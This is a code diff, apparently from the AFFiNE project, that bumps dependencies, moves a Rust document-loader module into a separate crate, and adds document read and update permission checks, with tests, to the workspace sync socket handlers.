"vite-plugin-istanbul": "^7.2.1",
"vite-plugin-wasm": "^3.5.0",
"vite-plugin-web-components-hmr": "^0.1.3"
+17 -2
View File
@@ -90,7 +90,7 @@
"typescript": "^5.9.3",
"typescript-eslint": "^8.55.0",
"unplugin-swc": "^1.5.9",
"vite": "^7.2.7",
"vite": "^7.3.5",
"vitest": "^4.1.8"
},
"packageManager": "yarn@4.13.0",
@@ -167,7 +167,22 @@
"typedarray": "npm:@nolyfill/typedarray@^1",
"macos-alias": "npm:@napi-rs/macos-alias@0.0.4",
"fs-xattr": "npm:@napi-rs/xattr@latest",
"ioredis": "5.8.2",
"@opentelemetry/core": "^2.8.0",
"@opentelemetry/resources": "^2.8.0",
"@opentelemetry/sdk-trace-base": "^2.8.0",
"@tootallnate/once": "^2.0.1",
"ioredis": "^5.11.1",
"js-yaml@npm:^4.1.0": "^4.2.0",
"js-yaml@npm:4.1.1": "^4.2.0",
"multer": "^2.2.0",
"protobufjs": "^7.6.4",
"tar": "^7.5.16",
"tmp": "^0.2.7",
"ws@npm:^8.18.0": "^8.21.0",
"ws@npm:^8.18.3": "^8.21.0",
"ws@npm:^8.19.0": "^8.21.0",
"ws@npm:8.20.1": "^8.21.0",
"ws@npm:~8.17.1": "^8.21.0",
"decode-named-character-reference@npm:^1.0.0": "patch:decode-named-character-reference@npm%3A1.0.2#~/.yarn/patches/decode-named-character-reference-npm-1.0.2-db17a755fd.patch",
"@atlaskit/pragmatic-drag-and-drop": "patch:@atlaskit/pragmatic-drag-and-drop@npm%3A1.4.0#~/.yarn/patches/@atlaskit-pragmatic-drag-and-drop-npm-1.4.0-75c45f52d3.patch",
"yjs": "patch:yjs@npm%3A13.6.21#~/.yarn/patches/yjs-npm-13.6.21-c9f1f3397c.patch"
+1 -1
View File
@@ -11,13 +11,13 @@ crate-type = ["cdylib"]
[dependencies]
aes-gcm = { workspace = true }
affine_common = { workspace = true, features = [
"doc-loader",
"hashcash",
"napi",
"ydoc-loader",
] }
anyhow = { workspace = true }
chrono = { workspace = true }
doc_extractor = { workspace = true }
file-format = { workspace = true }
hex = { workspace = true }
image = { workspace = true }
+2 -1
View File
@@ -1,4 +1,5 @@
use affine_common::{doc_loader::Doc, napi_utils::map_napi_err};
use affine_common::napi_utils::map_napi_err;
use doc_extractor::Doc;
use napi::{
Env, Result, Status, Task,
bindgen_prelude::{AsyncTask, Buffer},
+20 -19
View File
@@ -45,27 +45,28 @@
"@node-rs/argon2": "^2.0.2",
"@node-rs/crc32": "^1.10.6",
"@opentelemetry/api": "^1.9.0",
"@opentelemetry/core": "^2.7.1",
"@opentelemetry/exporter-prometheus": "^0.218.0",
"@opentelemetry/exporter-zipkin": "^2.7.1",
"@opentelemetry/host-metrics": "^0.38.3",
"@opentelemetry/instrumentation": "^0.218.0",
"@opentelemetry/instrumentation-graphql": "^0.66.0",
"@opentelemetry/instrumentation-http": "^0.218.0",
"@opentelemetry/instrumentation-ioredis": "^0.66.0",
"@opentelemetry/instrumentation-nestjs-core": "^0.64.0",
"@opentelemetry/instrumentation-socket.io": "^0.65.0",
"@opentelemetry/resources": "^2.7.1",
"@opentelemetry/sdk-metrics": "^2.7.1",
"@opentelemetry/sdk-node": "^0.218.0",
"@opentelemetry/sdk-trace-node": "^2.7.1",
"@opentelemetry/semantic-conventions": "^1.38.0",
"@opentelemetry/core": "^2.8.0",
"@opentelemetry/exporter-prometheus": "^0.219.0",
"@opentelemetry/exporter-zipkin": "^2.8.0",
"@opentelemetry/host-metrics": "^0.39.0",
"@opentelemetry/instrumentation": "^0.219.0",
"@opentelemetry/instrumentation-graphql": "^0.67.0",
"@opentelemetry/instrumentation-http": "^0.219.0",
"@opentelemetry/instrumentation-ioredis": "^0.67.0",
"@opentelemetry/instrumentation-nestjs-core": "^0.65.0",
"@opentelemetry/instrumentation-socket.io": "^0.66.0",
"@opentelemetry/resources": "^2.8.0",
"@opentelemetry/sdk-metrics": "^2.8.0",
"@opentelemetry/sdk-node": "^0.219.0",
"@opentelemetry/sdk-trace-base": "^2.8.0",
"@opentelemetry/sdk-trace-node": "^2.8.0",
"@opentelemetry/semantic-conventions": "^1.41.1",
"@prisma/client": "^6.6.0",
"@prisma/instrumentation": "^6.7.0",
"@queuedash/api": "^3.16.0",
"@react-email/components": "^0.5.7",
"@socket.io/redis-adapter": "^8.3.0",
"bullmq": "5.77.6",
"bullmq": "^5.79.0",
"commander": "^13.1.0",
"cookie-parser": "^1.4.7",
"cross-env": "^10.1.0",
@@ -83,7 +84,7 @@
"html-validate": "^9.0.0",
"htmlrewriter": "^0.0.12",
"http-errors": "^2.0.0",
"ioredis": "^5.8.2",
"ioredis": "^5.11.1",
"is-mobile": "^5.0.0",
"jose": "^6.1.3",
"jsonwebtoken": "^9.0.3",
@@ -92,7 +93,7 @@
"nanoid": "^5.1.6",
"nest-winston": "^1.9.7",
"nestjs-cls": "^6.0.0",
"nodemailer": "^8.0.4",
"nodemailer": "^9.0.0",
"on-headers": "^1.1.0",
"piscina": "^5.1.4",
"prisma": "^6.6.0",
@@ -102,7 +103,7 @@
"rxjs": "^7.8.2",
"semver": "^7.7.4",
"ses": "^1.15.0",
"socket.io": "^4.8.1",
"socket.io": "^4.8.3",
"stripe": "^17.7.0",
"tldts": "^7.0.19",
"winston": "^3.17.0",
@@ -176,6 +176,31 @@ function createYjsUpdateBase64() {
return Buffer.from(update).toString('base64');
}
async function createSnapshot(
db: PrismaClient,
input: {
workspaceId: string;
docId: string;
userId: string;
blob?: Buffer;
state?: Buffer;
updatedAt?: Date;
}
) {
await db.snapshot.create({
data: {
id: input.docId,
workspaceId: input.workspaceId,
blob: input.blob ?? Buffer.from([1, 1]),
state: input.state ?? Buffer.from([1, 1]),
createdAt: input.updatedAt ?? new Date(),
updatedAt: input.updatedAt ?? new Date(),
createdBy: input.userId,
updatedBy: input.userId,
},
});
}
async function ensureSyncActiveUsersTable(db: PrismaClient) {
await db.$executeRawUnsafe(`
CREATE TABLE IF NOT EXISTS sync_active_users_minutely (
@@ -612,17 +637,10 @@ test('workspace sync delete-doc should enforce doc permissions', async t => {
}
);
await models.doc.setDefaultRole(workspace.id, docId, DocRole.None);
await db.snapshot.create({
data: {
id: docId,
workspaceId: workspace.id,
blob: Buffer.from([1, 1]),
state: Buffer.from([1, 1]),
createdAt: new Date(),
updatedAt: new Date(),
createdBy: owner.id,
updatedBy: owner.id,
},
await createSnapshot(db, {
workspaceId: workspace.id,
docId,
userId: owner.id,
});
const socket = createClient(url, cookieHeader);
@@ -657,3 +675,206 @@ test('workspace sync delete-doc should enforce doc permissions', async t => {
socket.disconnect();
}
});
test('workspace sync load-doc should enforce doc read permissions', async t => {
const db = app.get(PrismaClient);
const models = app.get(Models);
const { user: owner } = await login(app);
const { user: collaborator, cookieHeader } = await login(app);
const workspace = await models.workspace.create(owner.id);
const docId = 'private-load-doc';
await models.workspaceUser.set(
workspace.id,
collaborator.id,
WorkspaceRole.Collaborator,
{
status: WorkspaceMemberStatus.Accepted,
}
);
await models.doc.setDefaultRole(workspace.id, docId, DocRole.None);
await createSnapshot(db, {
workspaceId: workspace.id,
docId,
userId: owner.id,
});
const socket = createClient(url, cookieHeader);
try {
await waitForConnect(socket);
const join = unwrapResponse(
t,
await emitWithAck<{ clientId: string; success: boolean }>(
socket,
'space:join',
{
spaceType: 'workspace',
spaceId: workspace.id,
clientVersion: '0.26.0',
}
)
);
t.true(join.success);
const error = getErrorResponse(
t,
await emitWithAck(socket, 'space:load-doc', {
spaceType: 'workspace',
spaceId: workspace.id,
docId,
})
);
t.true(error.message.includes('Doc.Read'));
} finally {
socket.disconnect();
}
});
test('workspace sync push-doc-update should enforce doc update permissions', async t => {
const db = app.get(PrismaClient);
const models = app.get(Models);
const { user: owner } = await login(app);
const { user: collaborator, cookieHeader } = await login(app);
const workspace = await models.workspace.create(owner.id);
const docId = 'readonly-push-doc';
await models.workspaceUser.set(
workspace.id,
collaborator.id,
WorkspaceRole.Collaborator,
{
status: WorkspaceMemberStatus.Accepted,
}
);
await models.doc.setDefaultRole(workspace.id, docId, DocRole.None);
await models.docUser.set(
workspace.id,
docId,
collaborator.id,
DocRole.Reader
);
await createSnapshot(db, {
workspaceId: workspace.id,
docId,
userId: owner.id,
});
const socket = createClient(url, cookieHeader);
try {
await waitForConnect(socket);
const join = unwrapResponse(
t,
await emitWithAck<{ clientId: string; success: boolean }>(
socket,
'space:join',
{
spaceType: 'workspace',
spaceId: workspace.id,
clientVersion: '0.26.0',
}
)
);
t.true(join.success);
const error = getErrorResponse(
t,
await emitWithAck(socket, 'space:push-doc-update', {
spaceType: 'workspace',
spaceId: workspace.id,
docId,
update: createYjsUpdateBase64(),
})
);
t.true(error.message.includes('Doc.Update'));
const updates = await db.update.count({
where: {
workspaceId: workspace.id,
id: docId,
},
});
t.is(updates, 0);
} finally {
socket.disconnect();
}
});
test('workspace sync load-doc-timestamps should filter unreadable docs', async t => {
const db = app.get(PrismaClient);
const models = app.get(Models);
const { user: owner } = await login(app);
const { user: collaborator, cookieHeader } = await login(app);
const workspace = await models.workspace.create(owner.id);
const privateDocId = 'private-timestamp-doc';
const readableDocId = 'readable-timestamp-doc';
await models.workspaceUser.set(
workspace.id,
collaborator.id,
WorkspaceRole.Collaborator,
{
status: WorkspaceMemberStatus.Accepted,
}
);
await models.doc.setDefaultRole(workspace.id, privateDocId, DocRole.None);
await models.doc.setDefaultRole(workspace.id, readableDocId, DocRole.None);
await models.docUser.set(
workspace.id,
readableDocId,
collaborator.id,
DocRole.Reader
);
await createSnapshot(db, {
workspaceId: workspace.id,
docId: privateDocId,
userId: owner.id,
updatedAt: new Date('2026-01-01T00:00:00.000Z'),
});
await createSnapshot(db, {
workspaceId: workspace.id,
docId: readableDocId,
userId: owner.id,
updatedAt: new Date('2026-01-02T00:00:00.000Z'),
});
const socket = createClient(url, cookieHeader);
try {
await waitForConnect(socket);
const join = unwrapResponse(
t,
await emitWithAck<{ clientId: string; success: boolean }>(
socket,
'space:join',
{
spaceType: 'workspace',
spaceId: workspace.id,
clientVersion: '0.26.0',
}
)
);
t.true(join.success);
const timestamps = unwrapResponse(
t,
await emitWithAck<Record<string, number>>(
socket,
'space:load-doc-timestamps',
{
spaceType: 'workspace',
spaceId: workspace.id,
}
)
);
t.false(privateDocId in timestamps);
t.true(readableDocId in timestamps);
} finally {
socket.disconnect();
}
});
@@ -633,6 +633,7 @@ export class SpaceSyncGateway
@SubscribeMessage('space:load-doc')
async onLoadSpaceDoc(
@ConnectedSocket() client: Socket,
@CurrentUser() user: CurrentUser,
@MessageBody()
{ spaceType, spaceId, docId, stateVector }: LoadDocMessage
): Promise<
@@ -641,6 +642,13 @@ export class SpaceSyncGateway
const id = new DocID(docId, spaceId);
const adapter = this.selectAdapter(client, spaceType);
adapter.assertIn(spaceId);
await this.assertDocActionAllowed(
spaceType,
user.id,
spaceId,
id.guid,
'Doc.Read'
);
const doc = await adapter.diff(
spaceId,
@@ -666,7 +674,7 @@ export class SpaceSyncGateway
@ConnectedSocket() client: Socket,
@CurrentUser() user: CurrentUser,
@MessageBody() { spaceType, spaceId, docId }: DeleteDocMessage
) {
): Promise<EventResponse<{ success: true }>> {
const adapter = this.selectAdapter(client, spaceType);
await this.assertDocActionAllowed(
spaceType,
@@ -676,6 +684,7 @@ export class SpaceSyncGateway
'Doc.Delete'
);
await adapter.delete(spaceId, docId);
return { data: { success: true } };
}
/**
@@ -692,8 +701,13 @@ export class SpaceSyncGateway
const adapter = this.selectAdapter(client, spaceType);
// Quota recovery mode is intentionally not applied to sync in this phase.
// TODO(@forehalo): enable after frontend supporting doc revert
// await this.ac.user(user.id).doc(spaceId, docId).assert('Doc.Update');
await this.assertDocActionAllowed(
spaceType,
user.id,
spaceId,
docId,
'Doc.Update'
);
const timestamp = await adapter.push(
spaceId,
docId,
@@ -740,15 +754,32 @@ export class SpaceSyncGateway
@SubscribeMessage('space:load-doc-timestamps')
async onLoadDocTimestamps(
@ConnectedSocket() client: Socket,
@CurrentUser() user: CurrentUser,
@MessageBody()
{ spaceType, spaceId, timestamp }: LoadDocTimestampsMessage
): Promise<EventResponse<Record<string, number>>> {
const adapter = this.selectAdapter(client, spaceType);
const stats = await adapter.getTimestamps(spaceId, timestamp);
if (!stats || spaceType === SpaceType.Userspace) {
return {
data: stats ?? {},
};
}
const readableDocs = await this.ac
.user(user.id)
.workspace(spaceId)
.docs(
Object.keys(stats).map(docId => ({ docId })),
'Doc.Read'
);
const readableDocIds = new Set(readableDocs.map(doc => doc.docId));
return {
data: stats ?? {},
data: Object.fromEntries(
Object.entries(stats).filter(([docId]) => readableDocIds.has(docId))
),
};
}
+10 -67
View File
@@ -7,38 +7,8 @@ version = "0.1.0"
[features]
default = []
doc-loader = [
"docx-parser",
"infer",
"path-ext",
"pdf-extract",
"readability",
"serde",
"serde_json",
"strum_macros",
"text-splitter",
"thiserror",
"tiktoken-rs",
"tree-sitter",
"url",
]
hashcash = ["chrono", "sha3", "rand"]
napi = ["dep:napi"]
tree-sitter = [
"cc",
"dep:tree-sitter",
"dep:tree-sitter-c",
"dep:tree-sitter-c-sharp",
"dep:tree-sitter-cpp",
"dep:tree-sitter-go",
"dep:tree-sitter-java",
"dep:tree-sitter-javascript",
"dep:tree-sitter-kotlin-ng",
"dep:tree-sitter-python",
"dep:tree-sitter-rust",
"dep:tree-sitter-scala",
"dep:tree-sitter-typescript",
]
ydoc-loader = [
"assert-json-diff",
"nanoid",
@@ -51,49 +21,22 @@ ydoc-loader = [
[dependencies]
assert-json-diff = { workspace = true, optional = true }
chrono = { workspace = true, optional = true }
docx-parser = { workspace = true, optional = true }
infer = { workspace = true, optional = true }
nanoid = { workspace = true, optional = true }
napi = { workspace = true, optional = true }
path-ext = { workspace = true, optional = true }
pdf-extract = { workspace = true, optional = true }
pulldown-cmark = { workspace = true, optional = true }
rand = { workspace = true, optional = true }
readability = { workspace = true, optional = true, default-features = false }
serde = { workspace = true, optional = true, features = ["derive"] }
serde_json = { workspace = true, optional = true }
sha3 = { workspace = true, optional = true }
strum_macros = { workspace = true, optional = true }
text-splitter = { workspace = true, features = [
"markdown",
"tiktoken-rs",
], optional = true }
thiserror = { workspace = true, optional = true }
tiktoken-rs = { workspace = true, optional = true }
tree-sitter = { workspace = true, optional = true }
tree-sitter-c = { workspace = true, optional = true }
tree-sitter-c-sharp = { workspace = true, optional = true }
tree-sitter-cpp = { workspace = true, optional = true }
tree-sitter-go = { workspace = true, optional = true }
tree-sitter-java = { workspace = true, optional = true }
tree-sitter-javascript = { workspace = true, optional = true }
tree-sitter-kotlin-ng = { workspace = true, optional = true }
tree-sitter-python = { workspace = true, optional = true }
tree-sitter-rust = { workspace = true, optional = true }
tree-sitter-scala = { workspace = true, optional = true }
tree-sitter-typescript = { workspace = true, optional = true }
url = { workspace = true, optional = true }
y-octo = { workspace = true, optional = true }
chrono = { workspace = true, optional = true }
nanoid = { workspace = true, optional = true }
napi = { workspace = true, optional = true }
pulldown-cmark = { workspace = true, optional = true }
rand = { workspace = true, optional = true }
serde = { workspace = true, optional = true, features = ["derive"] }
serde_json = { workspace = true, optional = true }
sha3 = { workspace = true, optional = true }
thiserror = { workspace = true, optional = true }
y-octo = { workspace = true, optional = true }
[dev-dependencies]
criterion = { workspace = true }
rayon = { workspace = true }
tempfile = "3"
[build-dependencies]
cc = { version = "1", optional = true }
[[bench]]
harness = false
name = "hashcash"
@@ -1,174 +0,0 @@
use std::{
io::Cursor,
panic::{AssertUnwindSafe, catch_unwind},
path::PathBuf,
};
use path_ext::PathExt;
use super::*;
#[derive(Clone, Default)]
pub struct Chunk {
pub index: usize,
pub content: String,
pub start: Option<usize>,
pub end: Option<usize>,
}
pub struct DocOptions {
code_threshold: u64,
}
impl Default for DocOptions {
fn default() -> Self {
Self { code_threshold: 1000 }
}
}
pub struct Doc {
pub name: String,
pub chunks: Vec<Chunk>,
}
impl Doc {
pub fn new(file_path: &str, doc: &[u8]) -> LoaderResult<Self> {
Self::with_options(file_path, doc, DocOptions::default())
}
pub fn with_options(file_path: &str, doc: &[u8], options: DocOptions) -> LoaderResult<Self> {
if let Some(kind) = infer::get(&doc[..4096.min(doc.len())]).or(infer::get_from_path(file_path).ok().flatten()) {
if kind.extension() == "pdf" {
return Self::load_pdf(file_path, doc);
} else if kind.extension() == "docx" {
return Self::load_docx(file_path, doc);
} else if kind.extension() == "html" {
return Self::load_html(file_path, doc);
}
} else if let Ok(string) = String::from_utf8(doc.to_vec()).or_else(|_| {
String::from_utf16(
&doc
.chunks_exact(2)
.map(|b| u16::from_le_bytes([b[0], b[1]]))
.collect::<Vec<_>>(),
)
}) {
let path = PathBuf::from(file_path);
match path.ext_str() {
"md" => {
let loader = TextLoader::new(string);
let splitter = MarkdownSplitter::default();
return Self::from_loader(file_path, loader, splitter);
}
"rs" | "c" | "cpp" | "h" | "hpp" | "js" | "ts" | "tsx" | "go" | "py" => {
let name = path.full_str().to_string();
let loader = SourceCodeLoader::from_string(string).with_parser_option(LanguageParserOptions {
language: get_language_by_filename(&name)?,
parser_threshold: options.code_threshold,
});
let splitter = TokenSplitter::default();
return Self::from_loader(file_path, loader, splitter);
}
_ => {}
}
let loader = TextLoader::new(string);
let splitter = TokenSplitter::default();
return Self::from_loader(file_path, loader, splitter);
}
Err(LoaderError::Other("Failed to infer document type".into()))
}
fn from_loader(
file_path: &str,
loader: impl Loader + 'static,
splitter: impl TextSplitter + 'static,
) -> Result<Doc, LoaderError> {
let name = file_path.to_string();
let chunks = catch_unwind(AssertUnwindSafe(|| Self::get_chunks_from_loader(loader, splitter))).map_err(|e| {
LoaderError::Other(match e.downcast::<String>() {
Ok(v) => *v,
Err(e) => match e.downcast::<&str>() {
Ok(v) => v.to_string(),
_ => "Unknown Source of Error".to_owned(),
},
})
})??;
Ok(Self { name, chunks })
}
fn get_chunks_from_loader(
loader: impl Loader + 'static,
splitter: impl TextSplitter + 'static,
) -> Result<Vec<Chunk>, LoaderError> {
let docs = loader.load_and_split(splitter)?;
Ok(
docs
.into_iter()
.enumerate()
.map(|(index, d)| Chunk {
index,
content: d.page_content,
..Chunk::default()
})
.collect(),
)
}
fn load_docx(file_path: &str, doc: &[u8]) -> LoaderResult<Self> {
let loader = DocxLoader::new(Cursor::new(doc)).ok_or(LoaderError::Other("Failed to parse docx document".into()))?;
let splitter = TokenSplitter::default();
Self::from_loader(file_path, loader, splitter)
}
fn load_html(file_path: &str, doc: &[u8]) -> LoaderResult<Self> {
let loader = HtmlLoader::from_string(
String::from_utf8(doc.to_vec())?,
Url::parse(file_path).or(Url::parse("https://example.com/"))?,
);
let splitter = TokenSplitter::default();
Self::from_loader(file_path, loader, splitter)
}
fn load_pdf(file_path: &str, doc: &[u8]) -> LoaderResult<Self> {
let loader = PdfExtractLoader::new(Cursor::new(doc))?;
let splitter = TokenSplitter::default();
Self::from_loader(file_path, loader, splitter)
}
}
#[cfg(test)]
mod tests {
use std::{
fs::{read, read_to_string},
path::PathBuf,
};
use super::*;
const FIXTURES: [&str; 6] = [
"demo.docx",
"sample.pdf",
"sample.html",
"sample.rs",
"sample.c",
"sample.ts",
];
fn get_fixtures() -> PathBuf {
PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("fixtures")
}
#[test]
fn test_fixtures() {
let fixtures = get_fixtures();
for fixture in FIXTURES.iter() {
let buffer = read(fixtures.join(fixture)).unwrap();
let doc = Doc::with_options(fixture, &buffer, DocOptions { code_threshold: 0 }).unwrap();
for chunk in doc.chunks.iter() {
let output = read_to_string(fixtures.join(format!("{}.{}.md", fixture, chunk.index))).unwrap();
assert_eq!(chunk.content, output);
}
}
}
}
@@ -1,43 +0,0 @@
use std::{io, str::Utf8Error, string::FromUtf8Error};
use thiserror::Error;
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Error, Debug)]
pub enum LoaderError {
#[error("{0}")]
TextSplitter(#[from] TextSplitterError),
#[error(transparent)]
IO(#[from] io::Error),
#[error(transparent)]
Utf8(#[from] Utf8Error),
#[error(transparent)]
FromUtf8(#[from] FromUtf8Error),
#[error(transparent)]
PdfExtract(#[from] pdf_extract::Error),
#[error(transparent)]
PdfExtractOutput(#[from] pdf_extract::OutputError),
#[error(transparent)]
Readability(#[from] readability::error::Error),
#[error(transparent)]
UrlParse(#[from] url::ParseError),
#[error("Unsupported source language")]
UnsupportedLanguage,
#[error("Error: {0}")]
Other(String),
}
pub type LoaderResult<T> = Result<T, LoaderError>;
@@ -1,69 +0,0 @@
use docx_parser::MarkdownDocument;
use super::*;
#[derive(Debug)]
pub struct DocxLoader {
document: MarkdownDocument,
}
impl DocxLoader {
pub fn new<R: Read + Seek>(reader: R) -> Option<Self> {
Some(Self {
document: MarkdownDocument::from_reader(reader)?,
})
}
fn extract_text(&self) -> String {
self.document.to_markdown(false)
}
fn extract_text_to_doc(&self) -> Document {
Document::new(self.extract_text())
}
}
impl Loader for DocxLoader {
fn load(self) -> LoaderResult<Vec<Document>> {
let doc = self.extract_text_to_doc();
Ok(vec![doc])
}
}
#[cfg(test)]
mod tests {
use std::{fs::read, io::Cursor, path::PathBuf};
use super::*;
fn get_fixtures_path() -> PathBuf {
PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("fixtures")
}
#[test]
fn test_parse_docx() {
let docx_buffer = include_bytes!("../../../fixtures/demo.docx");
let parsed_buffer = include_str!("../../../fixtures/demo.docx.md");
{
let loader = DocxLoader::new(Cursor::new(docx_buffer)).unwrap();
let documents = loader.load().unwrap();
assert_eq!(documents.len(), 1);
assert_eq!(documents[0].page_content, parsed_buffer);
}
{
let loader = DocxLoader::new(Cursor::new(docx_buffer)).unwrap();
let documents = loader.load_and_split(TokenSplitter::default()).unwrap();
for (idx, doc) in documents.into_iter().enumerate() {
assert_eq!(
doc.page_content,
String::from_utf8_lossy(&read(get_fixtures_path().join(format!("demo.docx.{}.md", idx))).unwrap())
);
}
}
}
}
@@ -1,85 +0,0 @@
use std::{collections::HashMap, io::Cursor};
use serde_json::Value;
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Debug, Clone)]
pub struct HtmlLoader<R> {
html: R,
url: Url,
}
impl HtmlLoader<Cursor<Vec<u8>>> {
pub fn from_string<S: Into<String>>(input: S, url: Url) -> Self {
let input = input.into();
let reader = Cursor::new(input.into_bytes());
Self::new(reader, url)
}
}
impl<R: Read> HtmlLoader<R> {
pub fn new(html: R, url: Url) -> Self {
Self { html, url }
}
}
impl<R: Read + Send + Sync + 'static> Loader for HtmlLoader<R> {
fn load(mut self) -> LoaderResult<Vec<Document>> {
let cleaned_html = readability::extractor::extract(&mut self.html, &self.url)?;
let doc = Document::new(format!("{}\n{}", cleaned_html.title, cleaned_html.text))
.with_metadata(HashMap::from([("source".to_string(), Value::from(self.url.as_str()))]));
Ok(vec![doc])
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_html_loader() {
let input = "<p>Hello world!</p>";
let html_loader = HtmlLoader::new(input.as_bytes(), Url::parse("https://example.com/").unwrap());
let documents = html_loader.load().unwrap();
let expected = "\nHello world!";
assert_eq!(documents.len(), 1);
assert_eq!(
documents[0].metadata.get("source").unwrap(),
&Value::from("https://example.com/")
);
assert_eq!(documents[0].page_content, expected);
}
#[test]
fn test_html_load_from_path() {
let buffer = include_bytes!("../../../fixtures/sample.html");
let html_loader = HtmlLoader::new(Cursor::new(buffer), Url::parse("https://example.com/").unwrap());
let documents = html_loader.load().unwrap();
let expected = [
"Example Domain",
"",
" This domain is for use in illustrative examples in documents. You may",
" use this domain in literature without prior coordination or asking for",
" permission.",
" More information...",
]
.join("\n");
assert_eq!(documents.len(), 1);
assert_eq!(
documents[0].metadata.get("source").unwrap(),
&Value::from("https://example.com/")
);
assert_eq!(documents[0].page_content, expected);
}
}
@@ -1,28 +0,0 @@
mod docx;
mod html;
mod pdf;
mod source;
mod text;
use std::io::{Read, Seek};
use super::*;
// modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
pub trait Loader: Send + Sync {
fn load(self) -> LoaderResult<Vec<Document>>;
fn load_and_split<TS: TextSplitter + 'static>(self, splitter: TS) -> LoaderResult<Vec<Document>>
where
Self: Sized,
{
let docs = self.load()?;
Ok(splitter.split_documents(&docs)?)
}
}
pub use docx::DocxLoader;
pub use html::HtmlLoader;
pub use pdf::PdfExtractLoader;
pub use source::{LanguageParserOptions, SourceCodeLoader, get_language_by_filename};
pub use text::TextLoader;
pub use url::Url;
@@ -1,103 +0,0 @@
use pdf_extract::{PlainTextOutput, output_doc, output_doc_encrypted};
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Debug, Clone)]
pub struct PdfExtractLoader {
document: pdf_extract::Document,
}
impl PdfExtractLoader {
pub fn new<R: Read>(reader: R) -> Result<Self, LoaderError> {
let document = pdf_extract::Document::load_from(reader)?;
Ok(Self { document })
}
}
impl PdfExtractLoader {
fn extract_text(&self) -> Result<String, LoaderError> {
let mut doc = self.document.clone();
let mut buffer: Vec<u8> = Vec::new();
let mut output = PlainTextOutput::new(&mut buffer as &mut dyn std::io::Write);
if doc.is_encrypted() {
output_doc_encrypted(&mut doc, &mut output, "")?;
} else {
output_doc(&doc, &mut output)?;
}
Ok(String::from_utf8(buffer)?)
}
fn extract_text_to_doc(&self) -> Result<Document, LoaderError> {
let text = self.extract_text()?;
Ok(Document::new(text))
}
}
impl Loader for PdfExtractLoader {
fn load(self) -> LoaderResult<Vec<Document>> {
let doc = self.extract_text_to_doc()?;
Ok(vec![doc])
}
}
#[cfg(test)]
mod tests {
use std::{
fs::read,
io::Cursor,
path::{Path, PathBuf},
};
use path_ext::PathExt;
use super::*;
fn parse_pdf_content(path: &Path) -> Vec<Document> {
let buffer = read(path).unwrap();
let reader = Cursor::new(buffer);
let loader = PdfExtractLoader::new(reader).expect("Failed to create PdfExtractLoader");
loader.load().unwrap()
}
#[test]
fn test_parse_pdf() {
let fixtures = PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("fixtures");
let docs = parse_pdf_content(&fixtures.join("sample.pdf"));
assert_eq!(docs.len(), 1);
assert_eq!(
&docs[0].page_content[..100],
"\n\nSample PDF\nThis is a simple PDF file. Fun fun fun.\n\nLorem ipsum dolor sit amet, consectetuer a"
);
}
#[test]
#[ignore = "for debugging only"]
fn test_parse_pdf_custom() {
let mut args = std::env::args().collect::<Vec<_>>();
let fixtures = 'path: {
while let Some(path) = args.pop() {
let path = PathBuf::from(path);
if path.is_dir() {
break 'path path;
}
}
panic!("No directory provided");
};
for path in fixtures.walk_iter(|p| p.is_file() && p.ext_str() == "pdf") {
println!("Parsing: {}", path.display());
let docs = parse_pdf_content(&path);
let chunks = docs.len();
let words = docs.iter().map(|d| d.page_content.len()).sum::<usize>();
println!("{}: {} chunks, {} words", path.display(), chunks, words,);
}
}
}
@@ -1,61 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
mod parser;
pub use parser::{LanguageParser, LanguageParserOptions, get_language_by_filename};
use super::*;
#[derive(Debug, Clone)]
pub struct SourceCodeLoader {
content: String,
parser_option: LanguageParserOptions,
}
impl SourceCodeLoader {
pub fn from_string<S: Into<String>>(input: S) -> Self {
Self {
content: input.into(),
parser_option: LanguageParserOptions::default(),
}
}
}
impl SourceCodeLoader {
pub fn with_parser_option(mut self, parser_option: LanguageParserOptions) -> Self {
self.parser_option = parser_option;
self
}
}
impl Loader for SourceCodeLoader {
fn load(self) -> LoaderResult<Vec<Document>> {
let options = self.parser_option.clone();
let docs = LanguageParser::from_language(options.language)
.with_parser_threshold(options.parser_threshold)
.parse_code(&self.content)?;
Ok(docs)
}
}
#[cfg(test)]
mod tests {
use parser::Language;
use super::*;
#[test]
fn test_source_code_loader() {
let content = include_str!("../../../../fixtures/sample.rs");
let loader = SourceCodeLoader::from_string(content).with_parser_option(LanguageParserOptions {
language: Language::Rust,
..Default::default()
});
let documents_with_content = loader.load().unwrap();
assert_eq!(documents_with_content.len(), 1);
}
}
@@ -1,232 +0,0 @@
use std::{collections::HashMap, fmt::Debug, string::ToString};
use strum_macros::Display;
use tree_sitter::{Parser, Tree};
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Display, Debug, Clone)]
pub enum Language {
Rust,
C,
Cpp,
Javascript,
Typescript,
Go,
Python,
}
pub enum LanguageContentTypes {
SimplifiedCode,
FunctionsImpls,
}
impl std::fmt::Display for LanguageContentTypes {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(
f,
"{}",
match self {
LanguageContentTypes::SimplifiedCode => "simplified_code",
LanguageContentTypes::FunctionsImpls => "functions_impls",
}
)
}
}
#[derive(Debug, Clone)]
pub struct LanguageParserOptions {
pub parser_threshold: u64,
pub language: Language,
}
impl Default for LanguageParserOptions {
fn default() -> Self {
Self {
parser_threshold: 1000,
language: Language::Rust,
}
}
}
pub struct LanguageParser {
parser: Parser,
parser_options: LanguageParserOptions,
}
impl Debug for LanguageParser {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "LanguageParser {{ language: {:?} }}", self.parser_options.language)
}
}
impl Clone for LanguageParser {
fn clone(&self) -> Self {
LanguageParser {
parser: get_language_parser(&self.parser_options.language),
parser_options: self.parser_options.clone(),
}
}
}
pub fn get_language_by_filename(name: &str) -> LoaderResult<Language> {
let extension = name.split('.').next_back().ok_or(LoaderError::UnsupportedLanguage)?;
